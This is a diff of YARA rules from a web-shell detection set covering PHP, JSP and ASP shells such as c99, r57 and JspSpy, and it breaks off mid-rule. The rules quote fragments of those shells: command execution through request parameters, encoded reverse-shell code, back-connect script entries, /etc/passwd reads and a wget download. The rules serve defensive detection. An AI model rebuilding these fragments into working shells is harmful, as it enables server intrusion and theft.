+		$s0 = "sbFolder.append(\"<tr><td >&nbsp;</td><td>\");" fullword
+		$s1 = "return filesize / intDivisor + \".\" + strAfterComma + \" \" + strUnit;" fullword
+		$s5 = "FileInfo fi = (FileInfo) ht.get(\"cqqUploadFile\");" fullword
+		$s6 = "<input type=\"hidden\" name=\"cmd\" value=\"<%=strCmd%>\">" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Asp_1D
+rule SIGNATURE_BASE_Webshell_2_520_Job_Jspwebshell_1_2_Ma1_Ma4_2
 {
 	meta:
-		description = "Web Shell - file 1d.asp"
+		description = "Web Shell - from files 2.jsp, 520.jsp, job.jsp, JspWebshell 1.2.jsp, ma1.jsp, ma4.jsp, 2.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1366-L1379"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2689-L2711"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fad7504ca8a55d4453e552621f81563c"
-		logic_hash = "85b17fde8fb535b64e5eabc887428d9b73adc5bc6741a3a387f235a8b0c6089a"
+		logic_hash = "49614b2a42210fa134f85fa52c66e12809f2bb9eaf56c17b69d21e5fbfc8888b"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "64a3bf9142b045b9062b204db39d4d57"
+		hash1 = "9abd397c6498c41967b4dd327cf8b55a"
+		hash2 = "56c005690da2558690c4aa305a31ad37"
+		hash3 = "70a0ee2624e5bbe5525ccadc467519f6"
+		hash4 = "532b93e02cddfbb548ce5938fe2f5559"
+		hash5 = "6e0fa491d620d4af4b67bae9162844ae"
+		hash6 = "7eabe0f60975c0c73d625b7ddf7b9cbd"
 
 	strings:
-		$s0 = "+9JkskOfKhUxZJPL~\\(mD^W~[,{@#@&EO"
+		$s1 = "while ((nRet = insReader.read(tmpBuffer, 0, 1024)) != -1) {" fullword
+		$s6 = "password = (String)session.getAttribute(\"password\");" fullword
+		$s7 = "insReader = new InputStreamReader(proc.getInputStream(), Charset.forName(\"GB231"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Ixrbe
+rule SIGNATURE_BASE_Webshell_Shell_2008_2009Mssql_Phpspy_2005_Full_Phpspy_2006_Arabicspy_Hkrkoz
 {
 	meta:
-		description = "Web Shell - file IXRbE.jsp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1380-L1393"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2712-L2736"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e26e7e0ebc6e7662e1123452a939e2cd"
-		logic_hash = "8710d092b81c5de1e328ad6e57e5c4a25748cc92844198038c103dabc1e76e77"
-		score = 70
+		logic_hash = "140af92ab61059649a872bef96b916f2c402fd9891301d4a1ba1f389a45af003"
+		score = 60
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "791708057d8b429d91357d38edf43cc0"
+		hash1 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash2 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash3 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash4 = "40a1f840111996ff7200d18968e42cfe"
+		hash5 = "e0202adff532b28ef1ba206cf95962f2"
+		hash6 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s0 = "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application"
+		$s0 = "$tabledump .= \"'\".mysql_escape_string($row[$fieldcounter]).\"'\";" fullword
+		$s5 = "while(list($kname, $columns) = @each($index)) {" fullword
+		$s6 = "$tabledump = \"DROP TABLE IF EXISTS $table;\\n\";" fullword
+		$s9 = "$tabledump .= \"   PRIMARY KEY ($colnames)\";" fullword
+		$fn = "filename: backup"
 
 	condition:
-		all of them
+		2 of ( $s* ) and not $fn
 }
-rule SIGNATURE_BASE_Webshell_PHP_G5
+rule SIGNATURE_BASE_Webshell_Gfs_Sh_R57Shell_R57Shell127_Sniper_SA_Xxx
 {
 	meta:
-		description = "Web Shell - file G5.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1394-L1407"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2737-L2762"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "95b4a56140a650c74ed2ec36f08d757f"
-		logic_hash = "2edffbea5142ef146cec57cb88b473532f56ab3e95151c5648eaeabe6a75feda"
+		logic_hash = "24d93f9ae5e174873a32abdf8dca6c00f03cbb4c5e2ad531ac7fa34f8fc90794"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "a2516ac6ee41a7cf931cbaef1134a9e4"
+		hash1 = "ef43fef943e9df90ddb6257950b3538f"
+		hash2 = "ae025c886fbe7f9ed159f49593674832"
+		hash3 = "911195a9b7c010f61b66439d9048f400"
+		hash4 = "697dae78c040150daff7db751fc0c03c"
+		hash5 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash6 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash7 = "e5b2131dd1db0dbdb43b53c5ce99016a"
+		hash8 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash9 = "41af6fd253648885c7ad2ed524e0692d"
+		hash10 = "6fcc283470465eed4870bcc3e2d7f14d"
 
 	strings:
-		$s3 = "echo \"Hacking Mode?<br><select name='htype'><option >--------SELECT--------</op"
+		$s0 = "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuI"
+		$s11 = "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KIC"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_R57142
+rule SIGNATURE_BASE_Webshell_Itsec_Phpjackal_Itsecteam_Shell_Jhn
 {
 	meta:
-		description = "Web Shell - file r57142.php"
+		description = "Web Shell - from files itsec.php, PHPJackal.php, itsecteam_shell.php, jHn.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1408-L1421"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2763-L2782"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0911b6e6b8f4bcb05599b2885a7fe8a8"
-		logic_hash = "3afa0463de3acb12480dba1b2ab9cd53fca88216ba54c5e044e48ebd84bf17bd"
+		logic_hash = "0c97731c28f59a6fbab2b7882fae171da8d71add73ec92ab6093dec57fcd7207"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "8ae9d2b50dc382f0571cd7492f079836"
+		hash1 = "e2830d3286001d1455479849aacbbb38"
+		hash2 = "bd6d3b2763c705a01cc2b3f105a25fa4"
+		hash3 = "40c6ecf77253e805ace85f119fe1cebb"
 
 	strings:
-		$s0 = "$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');" fullword
+		$s0 = "$link=pg_connect(\"host=$host dbname=$db user=$user password=$pass\");" fullword
+		$s6 = "while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|"
+		$s9 = "while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_Tree
+rule SIGNATURE_BASE_Webshell_Shell_Ci_Biz_Was_Here_C100_V_Xxx
 {
 	meta:
-		description = "Web Shell - file tree.jsp"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1422-L1436"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2783-L2803"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "bcdf7bbf7bbfa1ffa4f9a21957dbcdfa"
-		logic_hash = "180aa4572a42d23f3e44589f876356ec973fd64cdd53bac69936b93699888ac2"
+		logic_hash = "a7841dec442877648a589045849f7f1b80316a30dda5a44ccc4bb626dbd2cdea"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "f2fa878de03732fbf5c86d656467ff50"
+		hash1 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
 
 	strings:
-		$s5 = "$('#tt2').tree('options').url = \"selectChild.action?checki"
-		$s6 = "String basePath = request.getScheme()+\"://\"+request.getServerName()+\":\"+requ"
+		$s2 = "if ($data{0} == \"\\x99\" and $data{1} == \"\\x01\") {return \"Error: \".$stri"
+		$s3 = "<OPTION VALUE=\"find /etc/ -type f -perm -o+w 2> /dev/null\""
+		$s4 = "<OPTION VALUE=\"cat /proc/version /proc/cpuinfo\">CPUINFO" fullword
+		$s7 = "<OPTION VALUE=\"wget http://ftp.powernet.com.tr/supermail/de"
+		$s9 = "<OPTION VALUE=\"cut -d: -f1,2,3 /etc/passwd | grep ::\">USER"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_C99Madshell_V_3_0_Smowu
+rule SIGNATURE_BASE_Webshell_NIX_REMOTE_WEB_SHELL_NIX_REMOTE_WEB_Xxx1
 {
 	meta:
-		description = "Web Shell - file smowu.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1437-L1451"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2804-L2823"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "74e1e7c7a6798f1663efb42882b85bee"
-		logic_hash = "d84a5c573b89790efdbe67a684feb7db88521027e86b7588f090696fd90cbc87"
+		logic_hash = "95d25e9dc75a9af91e23b8c53acb384616f5d8a78605200bdb94f016a7f160f6"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "0b19e9de790cd2f4325f8c24b22af540"
+		hash1 = "f3ca29b7999643507081caab926e2e74"
+		hash2 = "527cf81f9272919bf872007e21c4bdda"
 
 	strings:
-		$s2 = "<tr><td width=\"50%\" height=\"1\" valign=\"top\"><center><b>:: Enter ::</b><for"
-		$s8 = "<p><font color=red>Wordpress Not Found! <input type=text id=\"wp_pat\"><input ty"
+		$s1 = "<td><input size=\"48\" value=\"$docr/\" name=\"path\" type=\"text\"><input type="
+		$s2 = "$uploadfile = $_POST['path'].$_FILES['file']['name'];" fullword
+		$s6 = "elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}" fullword
+		$s7 = "if ($_POST['path']==\"\"){$uploadfile = $_FILES['file']['name'];}" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Simple_Backdoor
+rule SIGNATURE_BASE_Webshell_C99_C99Shell_C99_W4Cking_Shell_Xxx
 {
 	meta:
-		description = "Web Shell - file simple-backdoor.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1452-L1467"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2824-L2852"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "f091d1b9274c881f8e41b2f96e6b9936"
-		logic_hash = "252285e8a796757235d775427e5a73980d065c1221190545428910a77f46bb9a"
+		logic_hash = "731bbf06208d20874c1d8464472e6a66a2e9b0bc2dc0475783763b99eb70fefa"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "9c34adbc8fd8d908cbb341734830f971"
+		hash3 = "f2fa878de03732fbf5c86d656467ff50"
+		hash4 = "b8f261a3cdf23398d573aaf55eaf63b5"
+		hash5 = "27786d1e0b1046a1a7f67ee41c64bf4c"
+		hash6 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash7 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash8 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash9 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s0 = "$cmd = ($_REQUEST['cmd']);" fullword
-		$s1 = "if(isset($_REQUEST['cmd'])){" fullword
-		$s4 = "system($cmd);" fullword
+		$s0 = "echo \"<b>HEXDUMP:</b><nobr>"
+		$s4 = "if ($filestealth) {$stat = stat($d.$f);}" fullword
+		$s5 = "while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo \"<tr><td>\".$r"
+		$s6 = "if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo \"DB "
+		$s8 = "echo \"<center><b>Server-status variables:</b><br><br>\";" fullword
+		$s9 = "echo \"<textarea cols=80 rows=10>\".htmlspecialchars($encoded).\"</textarea>"
 
 	condition:
 		2 of them
 }
-rule SIGNATURE_BASE_Webshell_PHP_404
+rule SIGNATURE_BASE_Webshell_2008_2009Mssql_Phpspy_2005_Full_Phpspy_2006_Arabicspy_Hkrkoz
 {
 	meta:
-		description = "Web Shell - file 404.php"
+		description = "Web Shell"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "41a0560a-b22e-5028-8ad1-710c5758cb1d"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1468-L1481"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2853-L2875"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "078c55ac475ab9e028f94f879f548bca"
-		logic_hash = "b0524ecddf990048e3e40f471c24075c0e87654c6fe40f17dc3ff43743402e24"
+		logic_hash = "2d78db4d45a35d6a78d4288e00a382a0937e3806f0570bd353b88955664a47f6"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3e4ba470d4c38765e4b16ed930facf2c"
+		hash1 = "aa17b71bb93c6789911bd1c9df834ff9"
+		hash2 = "b68bfafc6059fd26732fa07fb6f7f640"
+		hash3 = "40a1f840111996ff7200d18968e42cfe"
+		hash4 = "e0202adff532b28ef1ba206cf95962f2"
+		hash5 = "802f5cae46d394b297482fd0c27cb2fc"
 
 	strings:
-		$s4 = "<span>Posix_getpwuid (\"Read\" /etc/passwd)"
+		$s0 = "$this -> addFile($content, $filename);" fullword
+		$s3 = "function addFile($data, $name, $time = 0) {" fullword
+		$s8 = "function unix2DosTime($unixtime = 0) {" fullword
+		$s9 = "foreach($filelist as $filename){" fullword
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Webshell_Macker_S_Private_Phpshell
+rule SIGNATURE_BASE_Webshell_C99_C66_C99_Shadows_Mod_C99Shell
 {
 	meta:
-		description = "Web Shell - file Macker's Private PHPShell.php"
+		description = "Web Shell - from files c99.php, c66.php, c99-shadows-mod.php, c99shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1482-L1497"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2876-L2898"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e24cbf0e294da9ac2117dc660d890bb9"
-		logic_hash = "4bccc1aca8698e601133436a55538c08e3e1fa113a0776c04590eaf4a10fd309"
+		logic_hash = "b50a6124f25bbb6fcc9d16d1de26d833a4b968db8e8033e76f3a74695577017e"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "0f5b9238d281bc6ac13406bb24ac2a5b"
+		hash2 = "68c0629d08b1664f5bcce7d7f5f71d22"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s3 = "echo \"<tr><td class=\\\"silver border\\\">&nbsp;<strong>Server's PHP Version:&n"
-		$s4 = "&nbsp;&nbsp;<?php echo buildUrl(\"<font color=\\\"navy\\\">["
-		$s7 = "echo \"<form action=\\\"$SFileName?$urlAdd\\\" method=\\\"POST\\\"><input type="
+		$s2 = "  if (unlink(_FILE_)) {@ob_clean(); echo \"Thanks for using c99shell v.\".$shv"
+		$s3 = "  \"c99sh_backconn.pl\"=>array(\"Using PERL\",\"perl %path %host %port\")," fullword
+		$s4 = "<br><TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#66"
+		$s7 = "   elseif (!$data = c99getsource($bind[\"src\"])) {echo \"Can't download sources"
+		$s8 = "  \"c99sh_datapipe.pl\"=>array(\"Using PERL\",\"perl %path %localport %remotehos"
+		$s9 = "   elseif (!$data = c99getsource($bc[\"src\"])) {echo \"Can't download sources!"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Antichat_Shell_V1_3_2
+rule SIGNATURE_BASE_Webshell_He1P_Jspspy_Nogfw_Ok_Style_1_Jspspy1
 {
 	meta:
-		description = "Web Shell - file Antichat Shell v1.3.php"
+		description = "Web Shell - from files he1p.jsp, JspSpy.jsp, nogfw.jsp, ok.jsp, style.jsp, 1.jsp, JspSpy.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1498-L1511"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2899-L2922"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "40d0abceba125868be7f3f990f031521"
-		logic_hash = "d5a1dc31f442f8db7771ee64164436f6c562ef9f4a203a1e2006d37f9df91846"
+		logic_hash = "522ba5f797e33c27fef3ae8d89889c31799073ed3c770a49401f4d42ead04640"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "b330a6c2d49124ef0729539761d6ef0b"
+		hash1 = "d71716df5042880ef84427acee8b121e"
+		hash2 = "344f9073576a066142b2023629539ebd"
+		hash3 = "32dea47d9c13f9000c4c807561341bee"
+		hash4 = "b9744f6876919c46a29ea05b1d95b1c3"
+		hash5 = "3ea688e3439a1f56b16694667938316d"
+		hash6 = "2434a7a07cb47ce25b41d30bc291cacc"
 
 	strings:
-		$s3 = "$header='<html><head><title>'.getenv(\"HTTP_HOST\").' - Antichat Shell</title><m"
+		$s0 = "\"\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>\"+" fullword
+		$s4 = "out.println(\"<h2>File Manager - Current disk &quot;\"+(cr.indexOf(\"/\") == 0?"
+		$s7 = "String execute = f.canExecute() ? \"checked=\\\"checked\\\"\" : \"\";" fullword
+		$s8 = "\"<td nowrap>\"+f.canRead()+\" / \"+f.canWrite()+\" / \"+f.canExecute()+\"</td>"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Safe_Mode_Breaker
+rule SIGNATURE_BASE_Webshell_000_403_C5_Config_Myxx_Querydong_Spyjsp2010_Zend
 {
 	meta:
-		description = "Web Shell - file Safe mode breaker.php"
+		description = "Web Shell - from files 000.jsp, 403.jsp, c5.jsp, config.jsp, myxx.jsp, queryDong.jsp, spyjsp2010.jsp, zend.jsp"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1512-L1526"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2923-L2946"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5bd07ccb1111950a5b47327946bfa194"
-		logic_hash = "4adcefc05413a02653a2a405791345a1a76058a39f6e2b03765c4485f7c6b106"
+		logic_hash = "7ca710973592718c5455508c5798b3c51dce994d5ebd33aa3a59d1b03c096bdf"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "2eeb8bf151221373ee3fd89d58ed4d38"
+		hash1 = "059058a27a7b0059e2c2f007ad4675ef"
+		hash2 = "8b457934da3821ba58b06a113e0d53d9"
+		hash3 = "d44df8b1543b837e57cc8f25a0a68d92"
+		hash4 = "e0354099bee243702eb11df8d0e046df"
+		hash5 = "90a5ba0c94199269ba33a58bc6a4ad99"
+		hash6 = "655722eaa6c646437c8ae93daac46ae0"
+		hash7 = "591ca89a25f06cf01e4345f98a22845c"
 
 	strings:
-		$s5 = "preg_match(\"/SAFE\\ MODE\\ Restriction\\ in\\ effect\\..*whose\\ uid\\ is("
-		$s6 = "$path =\"{$root}\".((substr($root,-1)!=\"/\") ? \"/\" : NULL)."
+		$s0 = "return new Double(format.format(value)).doubleValue();" fullword
+		$s5 = "File tempF = new File(savePath);" fullword
+		$s9 = "if (tempF.isDirectory()) {" fullword
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Sst_Sheller
+rule SIGNATURE_BASE_Webshell_C99_C99Shell_C99_C99Shell
 {
 	meta:
-		description = "Web Shell - file Sst-Sheller.php"
+		description = "Web Shell - from files c99.php, c99shell.php, c99.php, c99shell.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		id = "ce88027c-ae08-59f3-948d-6f3d58515468"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1527-L1541"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2947-L2965"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d93c62a0a042252f7531d8632511ca56"
-		logic_hash = "4faac0b22fec809f2100bad200ba1f9fb9e16fab743e1b1cbfe0b80c6d2fee32"
+		logic_hash = "b999b1a8307e228fb97772799369e292fb806d614159f2b2abfc7a71c5bdb225"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "61a92ce63369e2fa4919ef0ff7c51167"
+		hash1 = "d3f38a6dc54a73d304932d9227a739ec"
+		hash2 = "157b4ac3c7ba3a36e546e81e9279eab5"
+		hash3 = "048ccc01b873b40d57ce25a4c56ea717"
 
 	strings:
-		$s2 = "echo \"<a href='?page=filemanager&id=fm&fchmod=$dir$file'>"
-		$s3 = "<? unlink($filename); unlink($filename1); unlink($filename2); unlink($filename3)"
+		$s2 = "$bindport_pass = \"c99\";" fullword
+		$s5 = " else {echo \"<b>Execution PHP-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr"
 
 	condition:
-		all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Webshell_Jsp_List
+rule SIGNATURE_BASE_Webshell_R57Shell127_R57_Ifx_R57_Kartal_R57_Antichat
 {
 	meta:
-		description = "Web Shell - file list.jsp"
+		description = "Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php"
 		author = "Florian Roth (Nextron Systems)"
 		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
 		date = "2014-01-28"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L1542-L1557"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L2966-L2987"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1ea290ff4259dcaeb680cec992738eda"
-		logic_hash = "5641bff0ec161fe72e502641b6138186d541ebfcbf499e0295a61f9f6f085654"
+		logic_hash = "23887963068f7dd2e4c85b11079276a00786d1a753f22e3b63f01139087a7f4c"
 		score = 70
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "ae025c886fbe7f9ed159f49593674832"
+		hash1 = "513b7be8bd0595c377283a7c87b44b2e"
+		hash2 = "1d912c55b96e2efe8ca873d6040e3b30"
+		hash3 = "4108f28a9792b50d95f95b9e5314fa1e"
+		hash4 = "3f71175985848ee46cc13282fbed2269"
 
 	strings:
-		$s0 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
